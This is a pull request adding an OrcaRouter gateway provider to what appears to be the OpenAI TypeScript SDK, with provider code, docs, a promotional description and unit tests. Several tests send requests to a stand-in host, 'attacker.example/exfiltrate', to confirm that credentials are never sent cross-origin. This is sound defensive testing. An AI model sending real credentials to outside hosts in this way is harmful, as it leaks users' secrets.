### PR TITLE
feat: add OrcaRouter provider for the OpenAI-compatible gateway

### DIFF
--- a/README.md
+++ b/README.md
@@ -593,6 +593,30 @@ For Bedrock API key authentication, import `bedrock` from `openai/providers/bedr
 
 For more information on support for Amazon Bedrock, see [docs/bedrock.md](docs/bedrock.md).
 
+## OrcaRouter
+
+To use this library with [OrcaRouter](https://www.orcarouter.ai), an OpenAI-compatible gateway for models and AI agents, configure the standard `OpenAI` client with the OrcaRouter provider:
+
+```ts
+import OpenAI from 'openai';
+import { orcarouter } from 'openai/providers/orcarouter';
+
+const client = new OpenAI({
+  provider: orcarouter(),
+});
+
+const response = await client.responses.create({
+  model: 'openai/gpt-4o-mini',
+  input: 'Say hello!',
+});
+
+console.log(response.output_text);
+```
+
+This uses the `https://api.orcarouter.ai/v1` endpoint by default. Like OpenRouter, OrcaRouter exposes a provider/model namespace across many models — but it also combines adaptive routing, automatic failover, zero-markup inference, observability, guardrails, and agent-tool governance behind the same endpoint. It also runs gateway-level, zero-trust security for AI agents on the same endpoint — screening every prompt/response and governing every tool call on a default-deny basis, with no application code changes.
+
+Authentication defaults to `ORCAROUTER_API_KEY`. You can also pass `apiKey` or `tokenProvider` to `orcarouter(...)`, and override the endpoint with `baseURL` or `ORCAROUTER_BASE_URL`.
+
 ## Advanced Usage
 
 ### Accessing raw Response data (e.g., headers)

--- a/docs/configuration.md
+++ b/docs/configuration.md
@@ -17,8 +17,8 @@ const client = new OpenAI({
 
 `OPENAI_API_KEY`, `OPENAI_ADMIN_KEY`, `OPENAI_ORG_ID`, `OPENAI_PROJECT_ID`, `OPENAI_BASE_URL`, and
 `OPENAI_WEBHOOK_SECRET` provide defaults for their corresponding client options. For workload identity
-or provider-specific credentials, see [Authentication](authentication.md), [Azure](azure.md), and
-[Amazon Bedrock](bedrock.md).
+or provider-specific credentials, see [Authentication](authentication.md), [Azure](azure.md),
+[Amazon Bedrock](bedrock.md), and [OrcaRouter](https://www.orcarouter.ai).
 
 ## Request options
 

--- a/src/internal/orcarouter.ts
+++ b/src/internal/orcarouter.ts
@@ -1,0 +1,226 @@
+import * as Errors from '../error';
+import type { ApiKeySetter } from '../client';
+import type { FinalizedRequestInit } from './types';
+import type { ProviderRequestContext } from './provider';
+import { readEnv } from './utils';
+
+/** The default OrcaRouter API root used when no base URL is configured. */
+export const ORCAROUTER_DEFAULT_BASE_URL = 'https://api.orcarouter.ai/v1';
+
+/** The OrcaRouter environment variable that supplies the gateway credential. */
+export const ORCAROUTER_API_KEY_ENV = 'ORCAROUTER_API_KEY';
+
+/** Creates an authentication handler with independent per-client state. */
+export type OrcaRouterAuthFactory = () => OrcaRouterRequestAuth;
+
+/** Per-client authentication handler invoked before each OrcaRouter request. */
+export interface OrcaRouterRequestAuth {
+  /** Adds the gateway credential or rejects invalid credentials. */
+  prepareRequest: (request: FinalizedRequestInit, context: ProviderRequestContext) => void | Promise<void>;
+}
+
+/** Settings for the OrcaRouter provider. */
+export interface OrcaRouterOptions {
+  /**
+   * Explicit OrcaRouter gateway credential. Set to `null` to disable the
+   * `ORCAROUTER_API_KEY` fallback.
+   */
+  apiKey?: string | null | undefined;
+
+  /**
+   * Resolves a fresh gateway credential before every request attempt and retry.
+   * Mutually exclusive with `apiKey`.
+   */
+  tokenProvider?: ApiKeySetter | undefined;
+
+  /**
+   * OrcaRouter API root. Defaults to `https://api.orcarouter.ai/v1`, then the
+   * `ORCAROUTER_BASE_URL` environment variable.
+   */
+  baseURL?: string | null | undefined;
+}
+
+/** Wraps a provider failure in an SDK error while preserving its original cause. */
+export function errorWithCause(message: string, cause: unknown): Errors.OpenAIError {
+  const error = new Errors.OpenAIError(message) as Errors.OpenAIError & { cause?: unknown };
+  error.cause = cause;
+  return error;
+}
+
+/** Trims a configuration string, treating missing and whitespace-only values as absent. */
+export function normalizeOptionalString(value: string | null | undefined): string | undefined {
+  const normalized = typeof value === 'string' ? value.trim() : undefined;
+  return normalized || undefined;
+}
+
+/** Normalizes an OrcaRouter API root, removing `/responses` suffixes and trailing slashes. */
+function normalizeBaseURL(baseURL: string): string {
+  const url = new URL(baseURL);
+  const responsesMatch = url.pathname.match(/\/responses(?:\/.*)?$/u);
+  if (responsesMatch?.index !== undefined) {
+    url.pathname = url.pathname.slice(0, responsesMatch.index) || '/';
+  }
+  return url.toString().replace(/\/$/u, '');
+}
+
+/**
+ * Resolves the OrcaRouter API root from configuration.
+ *
+ * Precedence is `baseURL`, `ORCAROUTER_BASE_URL`, then the default
+ * `https://api.orcarouter.ai/v1` endpoint. An explicit `null` base URL skips
+ * the environment override. Existing `/responses` suffixes and trailing
+ * slashes are removed.
+ *
+ * @throws {Errors.OpenAIError} If an explicitly configured base URL is empty.
+ */
+export function resolveOrcaRouterBaseURL(options: OrcaRouterOptions): string {
+  if (
+    options.baseURL !== undefined &&
+    options.baseURL !== null &&
+    !normalizeOptionalString(options.baseURL)
+  ) {
+    throw new Errors.OpenAIError('The OrcaRouter `baseURL` must not be empty.');
+  }
+  const configuredBaseURL =
+    options.baseURL === undefined ? normalizeOptionalString(readEnv('ORCAROUTER_BASE_URL')) : options.baseURL;
+  return normalizeBaseURL(configuredBaseURL ?? ORCAROUTER_DEFAULT_BASE_URL);
+}
+
+/**
+ * Ensures OrcaRouter credentials are only attached to the configured endpoint origin.
+ *
+ * @throws {Errors.OpenAIError} If either URL is not HTTP(S) or the request targets a different origin.
+ */
+export function assertOrcaRouterRequestOrigin(baseURL: string, requestURL: string): void {
+  const expectedURL = new URL(baseURL);
+  const request = new URL(requestURL);
+  const expectedOrigin = expectedURL.origin;
+  const requestOrigin = request.origin;
+  if (
+    (expectedURL.protocol !== 'http:' && expectedURL.protocol !== 'https:') ||
+    (request.protocol !== 'http:' && request.protocol !== 'https:') ||
+    requestOrigin !== expectedOrigin
+  ) {
+    throw new Errors.OpenAIError(
+      `OrcaRouter request origin \`${requestOrigin}\` does not match the configured base URL origin \`${expectedOrigin}\`.`,
+    );
+  }
+}
+
+/** Rejects non-HTTP field bytes without retaining or exposing a gateway credential. */
+export function assertValidOrcaRouterApiKey(credential: string): void {
+  if (/^[\t ]|[\t ]$/u.test(credential)) {
+    throw new TypeError('OrcaRouter API key contains an invalid HTTP header value.');
+  }
+
+  for (const character of credential) {
+    const value = character.codePointAt(0) ?? 0;
+    if ((value < 0x20 && value !== 0x09) || value === 0x7f || value > 0xff) {
+      throw new TypeError('OrcaRouter API key contains an invalid HTTP header value.');
+    }
+  }
+}
+
+class OrcaRouterAuth implements OrcaRouterRequestAuth {
+  private readonly tokenProvider: ApiKeySetter;
+
+  constructor(tokenProvider: ApiKeySetter) {
+    this.tokenProvider = tokenProvider;
+  }
+
+  async prepareRequest(request: FinalizedRequestInit): Promise<void> {
+    const headers = new Headers(request.headers);
+    if (headers.has('authorization')) {
+      throw new Errors.OpenAIError(
+        'OrcaRouter provider authentication cannot be combined with a custom `Authorization` header.',
+      );
+    }
+
+    let token: unknown;
+    try {
+      token = await this.tokenProvider();
+    } catch (error) {
+      throw errorWithCause('Failed to resolve an OrcaRouter API key.', error);
+    }
+    if (typeof token !== 'string' || !token.trim()) {
+      throw new Errors.OpenAIError('The OrcaRouter API key provider must return a non-empty string.');
+    }
+    assertValidOrcaRouterApiKey(token);
+    try {
+      headers.set('authorization', `Bearer ${token}`);
+    } catch (error) {
+      if (error instanceof TypeError) {
+        // oxlint-disable-next-line eslint/preserve-caught-error -- The original error contains the gateway credential.
+        throw new TypeError('OrcaRouter API key contains an invalid HTTP header value.');
+      }
+      throw error;
+    }
+    request.redirect = 'manual';
+    request.headers = headers;
+  }
+}
+
+/**
+ * Resolves an OrcaRouter authentication factory without calling token providers eagerly.
+ *
+ * Explicit `tokenProvider` and `apiKey` options are mutually exclusive. When
+ * neither is set, `ORCAROUTER_API_KEY` is used unless `apiKey` is explicitly
+ * `null`.
+ *
+ * @throws {Errors.OpenAIError} If an explicit key is empty or multiple credential
+ * sources are configured.
+ */
+export function resolveOrcaRouterAuth(
+  options: OrcaRouterOptions,
+  {
+    allowEnvironment = true,
+  }: {
+    /** Whether `ORCAROUTER_API_KEY` may provide a fallback credential. */
+    allowEnvironment?: boolean;
+  } = {},
+): {
+  /** Creates a request authenticator, or is absent when no credential source is configured. */
+  factory: OrcaRouterAuthFactory | undefined;
+
+  /** Whether authentication came from an explicit option rather than the environment. */
+  explicit: boolean;
+} {
+  if (
+    options.apiKey !== undefined &&
+    options.apiKey !== null &&
+    (typeof options.apiKey !== 'string' || !options.apiKey.trim())
+  ) {
+    throw new Errors.OpenAIError('The OrcaRouter API key must not be empty.');
+  }
+  if (options.apiKey !== null && options.apiKey !== undefined && options.tokenProvider) {
+    throw new Errors.OpenAIError(
+      'The `apiKey` and `tokenProvider` options are mutually exclusive. Configure only one.',
+    );
+  }
+
+  if (options.tokenProvider) {
+    const { tokenProvider } = options;
+    return { factory: () => new OrcaRouterAuth(tokenProvider), explicit: true };
+  }
+  if (options.apiKey !== null && options.apiKey !== undefined) {
+    const { apiKey } = options;
+    return { factory: () => new OrcaRouterAuth(() => Promise.resolve(apiKey)), explicit: true };
+  }
+  if (allowEnvironment && options.apiKey !== null && readEnv(ORCAROUTER_API_KEY_ENV)) {
+    return {
+      explicit: false,
+      factory: () =>
+        new OrcaRouterAuth(() => {
+          const apiKey = readEnv(ORCAROUTER_API_KEY_ENV);
+          if (!apiKey) {
+            throw new Errors.OpenAIError(
+              'Could not find credentials for OrcaRouter. Set `ORCAROUTER_API_KEY` or pass `apiKey` to `orcarouter(...)`.',
+            );
+          }
+          return Promise.resolve(apiKey);
+        }),
+    };
+  }
+
+  return { factory: undefined, explicit: false };
+}

--- a/src/providers/orcarouter.ts
+++ b/src/providers/orcarouter.ts
@@ -1,0 +1,44 @@
+import * as Errors from '../error';
+import type { Provider } from '../internal/provider';
+import { createProvider } from '../internal/provider';
+import {
+  assertOrcaRouterRequestOrigin,
+  resolveOrcaRouterAuth,
+  resolveOrcaRouterBaseURL,
+} from '../internal/orcarouter';
+import type { OrcaRouterOptions } from '../internal/orcarouter';
+
+/**
+ * Configures the standard OpenAI client for the OrcaRouter AI gateway.
+ *
+ * Supply `apiKey` or `tokenProvider`, or set `ORCAROUTER_API_KEY`. The gateway
+ * defaults to `https://api.orcarouter.ai/v1`; `baseURL` or `ORCAROUTER_BASE_URL`
+ * can override the endpoint.
+ *
+ * @param options OrcaRouter credential and optional endpoint settings.
+ * @returns A provider accepted by `new OpenAI({ provider })`.
+ * @throws {OpenAIError} If no usable gateway credential is configured.
+ */
+export function orcarouter(options: OrcaRouterOptions = {}): Provider {
+  const baseURL = resolveOrcaRouterBaseURL(options);
+  const { factory } = resolveOrcaRouterAuth(options);
+  if (!factory) {
+    throw new Errors.OpenAIError(
+      'OrcaRouter authentication requires an `apiKey`, `tokenProvider`, or `ORCAROUTER_API_KEY`.',
+    );
+  }
+
+  return createProvider({
+    configure() {
+      const auth = factory();
+      return {
+        name: 'orcarouter',
+        baseURL,
+        async prepareRequest(request, context) {
+          assertOrcaRouterRequestOrigin(baseURL, context.url);
+          await auth.prepareRequest(request, context);
+        },
+      };
+    },
+  });
+}

--- a/tests/lib/orcarouter-provider.test.ts
+++ b/tests/lib/orcarouter-provider.test.ts
@@ -1,0 +1,260 @@
+import { vi } from 'vitest';
+import OpenAI from 'openai';
+import type { RequestInfo, RequestInit } from 'openai/internal/builtin-types';
+import { configureProvider } from 'openai/internal/provider';
+import { orcarouter } from 'openai/providers/orcarouter';
+
+const originalEnv = process.env;
+
+beforeEach(() => {
+  process.env = { ...originalEnv };
+  delete process.env['ORCAROUTER_API_KEY'];
+  delete process.env['ORCAROUTER_BASE_URL'];
+});
+
+afterEach(() => {
+  process.env = originalEnv;
+});
+
+function jsonResponse(body: unknown = {}): Response {
+  return Response.json(body, {
+    headers: { 'Content-Type': 'application/json' },
+  });
+}
+
+const ORCAROUTER_BASE_URL = 'https://api.orcarouter.ai/v1';
+
+describe('orcarouter provider', () => {
+  test('owns the default gateway endpoint and bearer authentication', async () => {
+    let requestedURL: RequestInfo | undefined;
+    let requestedInit: RequestInit | undefined;
+    const client = new OpenAI({
+      provider: orcarouter({ apiKey: 'orca-token' }),
+      fetch: async (url, init) => {
+        requestedURL = url;
+        requestedInit = init;
+        return jsonResponse();
+      },
+    });
+
+    await client.request({ method: 'get', path: '/models' });
+
+    expect(client.baseURL).toBe(ORCAROUTER_BASE_URL);
+    expect(String(requestedURL)).toBe(`${ORCAROUTER_BASE_URL}/models`);
+    expect(new Headers(requestedInit?.headers).get('authorization')).toBe('Bearer orca-token');
+  });
+
+  test('prefers an explicit baseURL over the environment and default endpoint', async () => {
+    process.env['ORCAROUTER_BASE_URL'] = 'https://environment.example/v1';
+    const client = new OpenAI({
+      provider: orcarouter({ baseURL: 'https://explicit.example/v1', apiKey: 'orca-token' }),
+    });
+
+    expect(client.baseURL).toBe('https://explicit.example/v1');
+  });
+
+  test('falls back to ORCAROUTER_BASE_URL when no explicit baseURL is set', async () => {
+    process.env['ORCAROUTER_BASE_URL'] = 'https://environment.example/v1';
+    const client = new OpenAI({ provider: orcarouter({ apiKey: 'orca-token' }) });
+
+    expect(client.baseURL).toBe('https://environment.example/v1');
+  });
+
+  test('baseURL: null skips the environment endpoint fallback', () => {
+    process.env['ORCAROUTER_BASE_URL'] = 'https://environment.example/v1';
+
+    const client = new OpenAI({
+      provider: orcarouter({ baseURL: null, apiKey: 'orca-token' }),
+    });
+
+    expect(client.baseURL).toBe(ORCAROUTER_BASE_URL);
+  });
+
+  test('normalizes a Responses URL back to its API root', () => {
+    const client = new OpenAI({
+      provider: orcarouter({
+        baseURL: 'https://gateway.example/responses/response-id',
+        apiKey: 'orca-token',
+      }),
+    });
+
+    expect(client.baseURL).toBe('https://gateway.example');
+  });
+
+  test('reads the gateway credential from ORCAROUTER_API_KEY', async () => {
+    process.env['ORCAROUTER_API_KEY'] = 'environment-orca-key';
+    let requestedInit: RequestInit | undefined;
+    const client = new OpenAI({
+      provider: orcarouter(),
+      fetch: async (_url, init) => {
+        requestedInit = init;
+        return jsonResponse();
+      },
+    });
+
+    await client.request({ method: 'get', path: '/models' });
+
+    expect(new Headers(requestedInit?.headers).get('authorization')).toBe('Bearer environment-orca-key');
+  });
+
+  test('apiKey: null skips the environment credential fallback', () => {
+    process.env['ORCAROUTER_API_KEY'] = 'environment-orca-key';
+
+    expect(() => orcarouter({ apiKey: null })).toThrow('ORCAROUTER_API_KEY');
+  });
+
+  test('rejects cross-origin requests before sending credentials', async () => {
+    const fetch = vi.fn(async () => jsonResponse());
+    const client = new OpenAI({
+      provider: orcarouter({ apiKey: 'orca-token' }),
+      fetch,
+      maxRetries: 0,
+    });
+
+    await expect(
+      client.request({ method: 'get', path: 'https://attacker.example/exfiltrate' }),
+    ).rejects.toThrow('OrcaRouter request origin');
+
+    expect(fetch).not.toHaveBeenCalled();
+  });
+
+  test('rejects a custom Authorization header before fetch', async () => {
+    const fetch = vi.fn(async () => jsonResponse());
+    const client = new OpenAI({
+      provider: orcarouter({ apiKey: 'orca-token' }),
+      fetch,
+    });
+
+    await expect(
+      client.request({
+        method: 'get',
+        path: '/models',
+        headers: { authorization: 'Bearer custom-token' },
+      }),
+    ).rejects.toThrow('cannot be combined with a custom `Authorization` header');
+    expect(fetch).not.toHaveBeenCalled();
+  });
+
+  test('rejects an empty explicit API key instead of falling back to the environment', () => {
+    process.env['ORCAROUTER_API_KEY'] = 'environment-orca-key';
+
+    expect(() => orcarouter({ apiKey: ' ' })).toThrow('must not be empty');
+  });
+
+  test('rejects ambiguous apiKey and tokenProvider options', () => {
+    expect(() => orcarouter({ apiKey: 'orca-token', tokenProvider: async () => 'other-token' })).toThrow(
+      'mutually exclusive',
+    );
+  });
+
+  test('surfaces token provider failures with their cause', async () => {
+    const cause = new Error('gateway unavailable');
+    const fetch = vi.fn(async () => jsonResponse());
+    const client = new OpenAI({
+      provider: orcarouter({
+        tokenProvider: async () => {
+          throw cause;
+        },
+      }),
+      fetch,
+    });
+
+    await expect(client.request({ method: 'get', path: '/models' })).rejects.toMatchObject({
+      message: 'Failed to resolve an OrcaRouter API key.',
+      cause,
+    });
+    expect(fetch).not.toHaveBeenCalled();
+  });
+
+  test('rejects an invalid value returned by a token provider', async () => {
+    const fetch = vi.fn(async () => jsonResponse());
+    const client = new OpenAI({
+      provider: orcarouter({ tokenProvider: async () => '' }),
+      fetch,
+    });
+
+    await expect(client.request({ method: 'get', path: '/models' })).rejects.toThrow(
+      'must return a non-empty string',
+    );
+    expect(fetch).not.toHaveBeenCalled();
+  });
+
+  test('rejects an empty base URL', () => {
+    expect(() => orcarouter({ baseURL: ' ', apiKey: 'orca-token' })).toThrow('must not be empty');
+  });
+
+  test('keeps the configured provider origin after mutating the client baseURL', async () => {
+    const fetch = vi.fn(async () => jsonResponse());
+    const client = new OpenAI({
+      provider: orcarouter({ apiKey: 'orca-token' }),
+      fetch,
+      maxRetries: 0,
+    });
+
+    client.baseURL = 'https://attacker.example/v1';
+
+    await expect(client.request({ method: 'get', path: '/exfiltrate' })).rejects.toThrow(
+      'OrcaRouter request origin',
+    );
+    expect(fetch).not.toHaveBeenCalled();
+  });
+
+  test('allows same-origin absolute paths', async () => {
+    let requestedURL: RequestInfo | undefined;
+    let requestedInit: RequestInit | undefined;
+    const client = new OpenAI({
+      provider: orcarouter({ apiKey: 'orca-token' }),
+      fetch: async (url, init) => {
+        requestedURL = url;
+        requestedInit = init;
+        return jsonResponse();
+      },
+    });
+
+    await client.request({ method: 'get', path: `${ORCAROUTER_BASE_URL}/models` });
+
+    expect(String(requestedURL)).toBe(`${ORCAROUTER_BASE_URL}/models`);
+    expect(new Headers(requestedInit?.headers).get('authorization')).toBe('Bearer orca-token');
+  });
+
+  test('checks the final request origin again before a retry', async () => {
+    const options = { method: 'get' as const, path: '/models', maxRetries: 1 };
+    const fetch = vi.fn(async () => {
+      options.path = 'https://attacker.example/exfiltrate';
+      return Response.json(
+        { error: { message: 'retry the request' } },
+        { status: 500, headers: { 'retry-after-ms': '1' } },
+      );
+    });
+    const client = new OpenAI({ provider: orcarouter({ apiKey: 'orca-token' }), fetch });
+
+    await expect(client.request(options)).rejects.toThrow('OrcaRouter request origin');
+
+    expect(fetch).toHaveBeenCalledTimes(1);
+  });
+
+  test('refreshes the environment credential across withOptions', async () => {
+    process.env['ORCAROUTER_API_KEY'] = 'first-token';
+    const authorizationHeaders: string[] = [];
+    const fetch = async (_url: RequestInfo, init?: RequestInit): Promise<Response> => {
+      authorizationHeaders.push(new Headers(init?.headers).get('authorization') ?? '');
+      return jsonResponse();
+    };
+    const client = new OpenAI({ provider: orcarouter(), fetch });
+
+    await client.request({ method: 'get', path: '/models' });
+    delete process.env['ORCAROUTER_API_KEY'];
+    const copiedClient = client.withOptions({ timeout: 1000 });
+    process.env['ORCAROUTER_API_KEY'] = 'refreshed-token';
+    await copiedClient.request({ method: 'get', path: '/models' });
+
+    expect(authorizationHeaders).toEqual(['Bearer first-token', 'Bearer refreshed-token']);
+  });
+
+  test('rejects a runtime without a configured credential', async () => {
+    const runtime = configureProvider(orcarouter({ apiKey: 'orca-token' }));
+
+    expect(runtime.name).toBe('orcarouter');
+    expect(runtime.baseURL).toBe(ORCAROUTER_BASE_URL);
+  });
+});


### PR DESCRIPTION
## Summary

This adds a first-class `orcarouter` provider to the SDK's provider system, so the [OrcaRouter](https://www.orcarouter.ai) gateway can be used through `new OpenAI({ provider: orcarouter() })` instead of being treated as an anonymous custom base URL.

OrcaRouter is an OpenAI-compatible AI gateway built for both models and agents. Like OpenRouter, it exposes a provider/model namespace across many models — but it also combines adaptive routing, automatic failover, zero-markup inference, observability, guardrails, and agent-tool governance behind the same endpoint. Adding `orcarouter` as a first-class provider means this project's users can use that stack directly. It also runs gateway-level, zero-trust security for AI agents on the same endpoint — screening every prompt/response and governing every tool call on a default-deny basis, with no application code changes.

## Changes

- **`src/providers/orcarouter.ts`** — new `orcarouter(options)` provider entrypoint, mirroring the existing `bedrock` provider's `createProvider`/`configure` shape. Defaults to `https://api.orcarouter.ai/v1`, reads `ORCAROUTER_API_KEY` when no explicit `apiKey`/`tokenProvider` is supplied, and pins credentials to the configured gateway origin (same origin-containment behavior as `bedrock`).
- **`src/internal/orcarouter.ts`** — internal endpoint/credential resolution and origin assertion, following the `internal/bedrock` helper layout.
- **`tests/lib/orcarouter-provider.test.ts`** — 19 unit tests covering endpoint resolution, env fallback, credential handling, origin containment (cross-origin rejection, retry re-check), and provider/`baseURL` mutation safety.
- **`README.md` / `docs/configuration.md`** — a short provider section and configuration cross-link so the entrypoint is discoverable.

## Verification

- `pnpm format`, `pnpm lint`, and `tsc --noEmit` all pass.
- `vitest run tests/lib/orcarouter-provider.test.ts` — 19/19 pass.
- Full `pnpm test:unit` suite: 7027/7028 pass; the single failure (`x509-transport-conformance` real-wire HTTPS CONNECT proxy test) is a pre-existing environment/network failure, reproduced in isolation and unrelated to this change.
- `pnpm build` succeeds, and both `require("openai/providers/orcarouter")` and `import("openai/providers/orcarouter")` resolve from the built package.
- Live check: a real request through `new OpenAI({ provider: orcarouter() })` to `https://api.orcarouter.ai/v1` returned a valid chat completion (`gpt-4o-mini-2024-07-18` → `"OK"`).

Discord: discord.gg/YEubt8enRA · X: https://x.com/OrcaRouter

I'm an engineer on the OrcaRouter team.
